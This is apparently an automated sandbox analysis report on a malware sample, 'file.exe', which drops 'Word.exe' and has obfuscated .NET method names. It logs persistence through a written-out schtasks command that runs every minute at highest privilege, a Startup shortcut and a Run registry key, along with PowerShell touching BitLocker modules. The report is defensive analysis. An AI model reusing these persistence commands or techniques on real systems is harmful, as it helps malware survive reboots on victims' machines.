                    Source: file.exe, taMvE5W0keovYmuuyuBf5WmdOZd5KboRfyckDTKdG.csHigh entropy of concatenated method names: 'B1sdtwqjStM0CxJ0daBN2p8j1c7HzmmIoPeabstDR', 'ckTQjbYDptaMCC2UM8QfylDYF8zdBP7M07Bn0qAmR', '_5op32Unrsoa22ZVjocKNqFpf340T07Z3SESUriRDk', 'l0dqsDK2X3oeCsDwjebL5odKKY7szwF1VevaDXEpP', 'DKNw9fIjCCGpsFOxv4q73W61byabiUQOuIbmD11Sj', 'KkF6ezcTTJiff6HMC9GC6yfaL2csuxT9wMhcyLiUb', 'X3Qy98DjSo1ioa5NlyRTYe0MMFgQVH6sTxCDi8F50', 'LPYn3TE44Z1Z6NdpGbhvMLArGSGkNCaqMSfGCKYSo', '_0Nsh292PLReeg53MxGm4W6ijkJH0AyWkcvsEBBuXV', 'uYs4ipD2ZP26Dmpkri5aAaL9624qu0NOE8YUW3z98'
                    Source: file.exe, ub99fRJjxxhOnbd1IRYK3hmGl4xhrDhQcSfdxKqEc9S0YSzeggxQAVz5.csHigh entropy of concatenated method names: 'IsXvgMmWDDi0GKmwYfXrSLt4su9kFPU7wWk4lfnpKralluJOyR1O8H5Q', 'GYjnmKgKouHVNH0JdIwf0BeGwrjgK83lxgxu4AawyrjXy2giDgl7OT7e', 'etppLJxJSB1jXw7jBRZOYsBFNHfce6yLxQ9smSdnIVahjePL1eMC1LAB', 'mWhsJeu1pwPfZfLjMzwX60PYjwSHzjepZee8xvFSwREs50OlRjEgSSTm', 'gekegH71eyGepeEfXtreeLtMQWSFLQ0vOjK4IylgxNcojYqauU7DBT9z', 'YxrrqccR1sKFfWKqRULJsM2oeDbUQ7yc0StZ1sDtEe6XZYZEB2aSnM3t', 'AWDtNnkHUylCqjU5wBtXJXufIZzd4YgH3GLouwFMbOZjrJEw8YubsUH7', 'kTQwu5HWmkxLRwgqwypDw5vzcBwGdPLE0K28AYie9', 'd88PPtA5HFqo3U0zeirQAL0Crgqmtu2QQLqN3umq9', 'bVyXES4EP09o6Z7wQZtX3MUV2mYkzEhHtgQKMvMZ8'
                    Source: file.exe, iAbAE9flz7Sm8xHN82X5gX1oQxkYqqqskhT3TlE2n.csHigh entropy of concatenated method names: 'yRCrefISSSO9KWzUqTGsjiJCYUupPgUhVKJbAgB7W', '_5p0ZJXgaH19u9mytvv0RFgOtE1affrRAPVnNzHt0t', 'p6SnofuYomIiWhwmFFlhsbneqfXntomUysUzdhASI', 'z2Lq6F1gErbuz72', '_1UmFzQS39E58jJo', 'VWDpxUNsHVRQGN7', '_8chWRbguLFweSc4', '_8MANYhnxwTJW6Gp', 'KnLcf6fuIO1J1YJ', 'Tyf1roLBZp8DQw1'
                    Source: file.exe, RLNc59m3K5qBU9nVpBi0AKzQWHnZ4GB7uwf5x7A0VpPRtOmln5U0LHjGRFKVDduY3yBpI1XMO.csHigh entropy of concatenated method names: 'AJj4PiCzNRpVVh1h6SNCk5iZfdyq0b0DQIYopFB8yJ4gKPPDr3Zqilj0cG0wxgiv1eAVjnlEH', 'EODVf7Ga3OHYvpZ5fetPPbScOlbBvYCPP2T2XuHNaz0ropsh3bGXl84EB0PGQyAmgl1ml2mFp', 'oMAom6AsDSszDD6lMI1HpRML292RI6Dztw9FMNx6WcCK0PlhkfyqwWMEri8PXmjwmaFzqH4Mw', 'qSxMAfFfmHHBxkRhG2188bSZcWq3406xigdKjK2TPaqqAoI9Dwl9Ss27GoMwqlE6vbARGLgK8', '_8oCHdwqYLaRUveuWJIkD7TjCvXyn4an2steRTazFEKeh3Gd3dMPLZtOi3WaaYZe1QsDGgO0ol', '_4PqWNp3bk1I0rI8OjNdlnJqZwSpjTIioGh6A5wDM43ARFfHPBBBTvPLY9DuQ05ikhNyVJp9cW', 'hBTxg4VsVUIBuLR488GZa3LMpjRTTX7uMYI59ZclrrvJPu5GerqKmRc7AAWyJ29OxrtTOKan7', 'p2gx5I1BkIiUMU0j6O6WCSMAgQyevZiHQASksVw8A6zD1d9U8PoMs5B35yBqTCmiQaFdmWBgk', '_3OkkEhhbiTvhxzRqLQ4N4kGNKFHfDMsEtXqzDkpVkUHTHs7Mk0QIaIvCBdrcMgdm1Afyduwqz', 'dhkYYv1dzDNd5JQxzVjx7zNdGZqtqIg0egcJcaNyVCeo3EEoRn5DTeiVNR7XMUXnSKTIiacGs'
                    Source: file.exe, nA4euSjsOXy4pNXRxxctUrNzEHkcz7GLZ8jRdQKUWRYwesSxULAuplcxQqEOMiJ619XwMcogZ.csHigh entropy of concatenated method names: 'uu45Rv5DsusjQgpBVVgG6drwaZyN300zQP1phBMgvmjIsh9ckUZfcmX2KNHrFHoXLpZff18ji', '_32YdZyiF4lmfDB9CCpuMSFdeJUDyydqXKjtdtZUHXI5t634MQfkvhfULSWC1DqWQGbBSTt3oa', '_9thcFwXbldrAWPgJFSYabzPlxaP4fFSfEitnsICDu7ACg2C8bcxlJTD5QtA7THPzgNpuW6erN', 't9qiN0jKANMJcTKLiMAlFuLh6nngBwmJjtwhmiq2Q7FuXzG2RMWkyfHUI2AweoIj21NpJLBk6', 'ehwoKWrWLjfTr3D', 'h38quwluOc3NJwY', 'ypQJ4z7OYGJH2iT', 'ZKTBuq68FHQ4d7j', 'eVQmMrZ3XD90h7E', 'bMpYRpCW1FwN7Hw'
                    Source: file.exe, mYAr1k08yb0HzmCgp0BEzPHAJWWzMQXamHNPm3NQBAqCoG6fW6xB8GV5ryb6UTU5pbINLp5FL.csHigh entropy of concatenated method names: 'yLd9V3ROIm31ERTXD0xajGBQB7pdEvf0001HIgsDWZPuRyEDtOel1kxGNEmSCF7ugQvqXNeoy', 'DTI91qk01xp2Xyr', '_5BeCPNNVDa9jcy3', 'QmhPZC7bDNGvhzL', 'KZGPnKe0V6zZ2Sz'
                    Source: file.exe, uEQDD3u1jGnJYt3mdJfu6rTjMrGOSgb217iI9FQzr.csHigh entropy of concatenated method names: 'yPjBiu2tQwzsG1EvdKk6bXNC2NKqtsU4PSCDUOEhl', '_7jMSGkZwhKQVohw0oZ5Md5Oz1qwwxXktQrdXNNfbB', 'FRgpR3Pn3yK9WRhVUMtJNEbXVeaPGXCKO9lArRD9D', 'shbSv9a7eGnp5x2qMZUGcksIU4kxeD9n9yHHDfHLJ', 'iEUUwGfw6yGiFSffG4RCAoJrCYay9gFwcmYm7XiGp', 'Sl3uJzyILrI33SqacM45OALSR4KwRgr8U0bWkJrpz', 'C8phO5yygQn5FEr0XcHechQRsqmUDtPLa79Ex90uY', 'BJAvCHu8oMuEpDCOnKdvg4XCY3Q1eFr1KxYfUIaH7', 't9bvEz17aK9Ydr4UJnpfXDak4DUFDKdSQnsws99wJ', 'UHUjR2XSbfiLpzPihQpFBOW1Qziqwjmz9Ye2PXClK'
                    Source: file.exe, iAOKDQGA3p7c29dSlFXyhBvszZmOLR4yirK1dQmhKkiKPA7vvD2EiLbV.csHigh entropy of concatenated method names: 'JKzkQFAfSHN3L83QnEhOKLJLCHO8dmO9ARv7FKEk7pUkTVNlxG5BsfQ9', 'L2vM753d7Dvz77V3VDAaai6tM5FMqB9RJzfeOmOs2aCxoqGjuDmBiwX4', 'afeHLN8kThwb0gQVBIR8Qdk79oDR4Q2KH2nBP8Wbkl7L5vhjImb6yCsJ', 'DxTDZEw6QCIJ9ifsB8eBupaKt64QAmdyEZkxWKu6jamdS3bvX12q3Zo6', '_1LE7eTixST7GMYuXH9DiuunmlmN1u1Efei5YrKtlpDmRbjROVBlUTZeE', 'fiQKEjSpVLFy7FQmHdt0IzVARX4JRrk5fvR0jh6Kwg7Ydx4Na6Wd75NR', 'ZA4jiIEIVeTXq0qmjn4MR199tRbqnLBWurWi0bFyQUEI4v1NPkUskmTv', 'AIrHFaG48GvzkfPhSDiEXnozH6fuKAsbElFG618R0b1TOfgZdOGobksu', 'AWo2cC80KKF41sRpkT9o5s14YWvOpwy1xhyQa1LRYXogMZRoa6Fuq8d7', 'XC1VWYIdMnzksOS0yiRN5QDIIrq1imvEZmZ2kNNj2JkgSBzdWe03C23H'
                    Source: Word.exe.0.dr, YUxmYeJDPRnlw3T.csHigh entropy of concatenated method names: 'fHLOyVH2K85hG1c', 'Nj4BjAq5QDTawyp', 'NVQdiEA4atNmfH2', 'roLdd8FocBPmcSW3jWMzKVTgUvgrsdzdnAivvEQ74fnDPQfO4wvIwOr0Y2bwmvoxvRzRK9l0SPYOJH4JUyLEJoN7xTX', 'uSpsTOE1TNgf4Sn9Ym3ThUEw5cNz1VAXFQVgkvz4bTO6uNUi2oozVQSkDc4j9MFFUvEPhmWtytJldoYCcQDZxkxI62R', 'rSp9F2OqrcFdgQgRrxnOTxAUrXLAVYgaZrjpc8i5ocVE9lJBTK40mq1A8Wyyj0ZMYd0UMiMZ1YZJkuEiax2UWVMTh9q', 'Xw2PA45RnKlmWL1PepvBqLxa1XPrKgQhE2n8HbJiwFuDs79iLe1QiOr3i6MoLkgNBJJQ8NRz3Yltm4dIHrC93OPQIQi', 'rs5Q6SxzQBMFrjE0XBaNmiZAxEV6xADsYz8OqtjE31PBnFAadSGtNKppV0LGNxOofcxeey4JSIQILFEpYREDwcJvpki', 'vbkC3oZc3EAvpbzecwyokHeOyoY1WNif8edYgLPiXF5lAO3GynSkppZRBviou9Vj3CQHijUYPS50al5qSAJOjXIK4jL', 'wZkWBWuTFWXqwY6UyVpmuEvY4am8YRyliv5WevaCTx8KlmiOCa46bt53PctU17gjWaNgKbmhOT3uQ7Sy68YL6J54kZM'
                    Source: Word.exe.0.dr, taMvE5W0keovYmuuyuBf5WmdOZd5KboRfyckDTKdG.csHigh entropy of concatenated method names: 'B1sdtwqjStM0CxJ0daBN2p8j1c7HzmmIoPeabstDR', 'ckTQjbYDptaMCC2UM8QfylDYF8zdBP7M07Bn0qAmR', '_5op32Unrsoa22ZVjocKNqFpf340T07Z3SESUriRDk', 'l0dqsDK2X3oeCsDwjebL5odKKY7szwF1VevaDXEpP', 'DKNw9fIjCCGpsFOxv4q73W61byabiUQOuIbmD11Sj', 'KkF6ezcTTJiff6HMC9GC6yfaL2csuxT9wMhcyLiUb', 'X3Qy98DjSo1ioa5NlyRTYe0MMFgQVH6sTxCDi8F50', 'LPYn3TE44Z1Z6NdpGbhvMLArGSGkNCaqMSfGCKYSo', '_0Nsh292PLReeg53MxGm4W6ijkJH0AyWkcvsEBBuXV', 'uYs4ipD2ZP26Dmpkri5aAaL9624qu0NOE8YUW3z98'
                    Source: Word.exe.0.dr, ub99fRJjxxhOnbd1IRYK3hmGl4xhrDhQcSfdxKqEc9S0YSzeggxQAVz5.csHigh entropy of concatenated method names: 'IsXvgMmWDDi0GKmwYfXrSLt4su9kFPU7wWk4lfnpKralluJOyR1O8H5Q', 'GYjnmKgKouHVNH0JdIwf0BeGwrjgK83lxgxu4AawyrjXy2giDgl7OT7e', 'etppLJxJSB1jXw7jBRZOYsBFNHfce6yLxQ9smSdnIVahjePL1eMC1LAB', 'mWhsJeu1pwPfZfLjMzwX60PYjwSHzjepZee8xvFSwREs50OlRjEgSSTm', 'gekegH71eyGepeEfXtreeLtMQWSFLQ0vOjK4IylgxNcojYqauU7DBT9z', 'YxrrqccR1sKFfWKqRULJsM2oeDbUQ7yc0StZ1sDtEe6XZYZEB2aSnM3t', 'AWDtNnkHUylCqjU5wBtXJXufIZzd4YgH3GLouwFMbOZjrJEw8YubsUH7', 'kTQwu5HWmkxLRwgqwypDw5vzcBwGdPLE0K28AYie9', 'd88PPtA5HFqo3U0zeirQAL0Crgqmtu2QQLqN3umq9', 'bVyXES4EP09o6Z7wQZtX3MUV2mYkzEhHtgQKMvMZ8'
                    Source: Word.exe.0.dr, iAbAE9flz7Sm8xHN82X5gX1oQxkYqqqskhT3TlE2n.csHigh entropy of concatenated method names: 'yRCrefISSSO9KWzUqTGsjiJCYUupPgUhVKJbAgB7W', '_5p0ZJXgaH19u9mytvv0RFgOtE1affrRAPVnNzHt0t', 'p6SnofuYomIiWhwmFFlhsbneqfXntomUysUzdhASI', 'z2Lq6F1gErbuz72', '_1UmFzQS39E58jJo', 'VWDpxUNsHVRQGN7', '_8chWRbguLFweSc4', '_8MANYhnxwTJW6Gp', 'KnLcf6fuIO1J1YJ', 'Tyf1roLBZp8DQw1'
                    Source: Word.exe.0.dr, RLNc59m3K5qBU9nVpBi0AKzQWHnZ4GB7uwf5x7A0VpPRtOmln5U0LHjGRFKVDduY3yBpI1XMO.csHigh entropy of concatenated method names: 'AJj4PiCzNRpVVh1h6SNCk5iZfdyq0b0DQIYopFB8yJ4gKPPDr3Zqilj0cG0wxgiv1eAVjnlEH', 'EODVf7Ga3OHYvpZ5fetPPbScOlbBvYCPP2T2XuHNaz0ropsh3bGXl84EB0PGQyAmgl1ml2mFp', 'oMAom6AsDSszDD6lMI1HpRML292RI6Dztw9FMNx6WcCK0PlhkfyqwWMEri8PXmjwmaFzqH4Mw', 'qSxMAfFfmHHBxkRhG2188bSZcWq3406xigdKjK2TPaqqAoI9Dwl9Ss27GoMwqlE6vbARGLgK8', '_8oCHdwqYLaRUveuWJIkD7TjCvXyn4an2steRTazFEKeh3Gd3dMPLZtOi3WaaYZe1QsDGgO0ol', '_4PqWNp3bk1I0rI8OjNdlnJqZwSpjTIioGh6A5wDM43ARFfHPBBBTvPLY9DuQ05ikhNyVJp9cW', 'hBTxg4VsVUIBuLR488GZa3LMpjRTTX7uMYI59ZclrrvJPu5GerqKmRc7AAWyJ29OxrtTOKan7', 'p2gx5I1BkIiUMU0j6O6WCSMAgQyevZiHQASksVw8A6zD1d9U8PoMs5B35yBqTCmiQaFdmWBgk', '_3OkkEhhbiTvhxzRqLQ4N4kGNKFHfDMsEtXqzDkpVkUHTHs7Mk0QIaIvCBdrcMgdm1Afyduwqz', 'dhkYYv1dzDNd5JQxzVjx7zNdGZqtqIg0egcJcaNyVCeo3EEoRn5DTeiVNR7XMUXnSKTIiacGs'
                    Source: Word.exe.0.dr, nA4euSjsOXy4pNXRxxctUrNzEHkcz7GLZ8jRdQKUWRYwesSxULAuplcxQqEOMiJ619XwMcogZ.csHigh entropy of concatenated method names: 'uu45Rv5DsusjQgpBVVgG6drwaZyN300zQP1phBMgvmjIsh9ckUZfcmX2KNHrFHoXLpZff18ji', '_32YdZyiF4lmfDB9CCpuMSFdeJUDyydqXKjtdtZUHXI5t634MQfkvhfULSWC1DqWQGbBSTt3oa', '_9thcFwXbldrAWPgJFSYabzPlxaP4fFSfEitnsICDu7ACg2C8bcxlJTD5QtA7THPzgNpuW6erN', 't9qiN0jKANMJcTKLiMAlFuLh6nngBwmJjtwhmiq2Q7FuXzG2RMWkyfHUI2AweoIj21NpJLBk6', 'ehwoKWrWLjfTr3D', 'h38quwluOc3NJwY', 'ypQJ4z7OYGJH2iT', 'ZKTBuq68FHQ4d7j', 'eVQmMrZ3XD90h7E', 'bMpYRpCW1FwN7Hw'
                    Source: Word.exe.0.dr, mYAr1k08yb0HzmCgp0BEzPHAJWWzMQXamHNPm3NQBAqCoG6fW6xB8GV5ryb6UTU5pbINLp5FL.csHigh entropy of concatenated method names: 'yLd9V3ROIm31ERTXD0xajGBQB7pdEvf0001HIgsDWZPuRyEDtOel1kxGNEmSCF7ugQvqXNeoy', 'DTI91qk01xp2Xyr', '_5BeCPNNVDa9jcy3', 'QmhPZC7bDNGvhzL', 'KZGPnKe0V6zZ2Sz'
                    Source: Word.exe.0.dr, uEQDD3u1jGnJYt3mdJfu6rTjMrGOSgb217iI9FQzr.csHigh entropy of concatenated method names: 'yPjBiu2tQwzsG1EvdKk6bXNC2NKqtsU4PSCDUOEhl', '_7jMSGkZwhKQVohw0oZ5Md5Oz1qwwxXktQrdXNNfbB', 'FRgpR3Pn3yK9WRhVUMtJNEbXVeaPGXCKO9lArRD9D', 'shbSv9a7eGnp5x2qMZUGcksIU4kxeD9n9yHHDfHLJ', 'iEUUwGfw6yGiFSffG4RCAoJrCYay9gFwcmYm7XiGp', 'Sl3uJzyILrI33SqacM45OALSR4KwRgr8U0bWkJrpz', 'C8phO5yygQn5FEr0XcHechQRsqmUDtPLa79Ex90uY', 'BJAvCHu8oMuEpDCOnKdvg4XCY3Q1eFr1KxYfUIaH7', 't9bvEz17aK9Ydr4UJnpfXDak4DUFDKdSQnsws99wJ', 'UHUjR2XSbfiLpzPihQpFBOW1Qziqwjmz9Ye2PXClK'
                    Source: Word.exe.0.dr, iAOKDQGA3p7c29dSlFXyhBvszZmOLR4yirK1dQmhKkiKPA7vvD2EiLbV.csHigh entropy of concatenated method names: 'JKzkQFAfSHN3L83QnEhOKLJLCHO8dmO9ARv7FKEk7pUkTVNlxG5BsfQ9', 'L2vM753d7Dvz77V3VDAaai6tM5FMqB9RJzfeOmOs2aCxoqGjuDmBiwX4', 'afeHLN8kThwb0gQVBIR8Qdk79oDR4Q2KH2nBP8Wbkl7L5vhjImb6yCsJ', 'DxTDZEw6QCIJ9ifsB8eBupaKt64QAmdyEZkxWKu6jamdS3bvX12q3Zo6', '_1LE7eTixST7GMYuXH9DiuunmlmN1u1Efei5YrKtlpDmRbjROVBlUTZeE', 'fiQKEjSpVLFy7FQmHdt0IzVARX4JRrk5fvR0jh6Kwg7Ydx4Na6Wd75NR', 'ZA4jiIEIVeTXq0qmjn4MR199tRbqnLBWurWi0bFyQUEI4v1NPkUskmTv', 'AIrHFaG48GvzkfPhSDiEXnozH6fuKAsbElFG618R0b1TOfgZdOGobksu', 'AWo2cC80KKF41sRpkT9o5s14YWvOpwy1xhyQa1LRYXogMZRoa6Fuq8d7', 'XC1VWYIdMnzksOS0yiRN5QDIIrq1imvEZmZ2kNNj2JkgSBzdWe03C23H'
                    Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Roaming\Word.exeJump to dropped file

                    Boot Survival

                    barindex
                    Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Word" /tr "C:\Users\user\AppData\Roaming\Word.exe"
                    Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Word.lnkJump to behavior
                    Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Word.lnkJump to behavior
                    Source: C:\Users\user\Desktop\file.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run WordJump to behavior
                    Source: C:\Users\user\Desktop\file.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run WordJump to behavior

                    Hooking and other Techniques for Hiding and Protection

                    barindex
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                    Source: C:\Users\user\Desktop\file.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\2941D3B83AE7B9AA6CC8 88D9A666AFE4B49FD15B45F1DC568347855CF049E54918D00BAF1610AE750872Jump to behavior
                    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
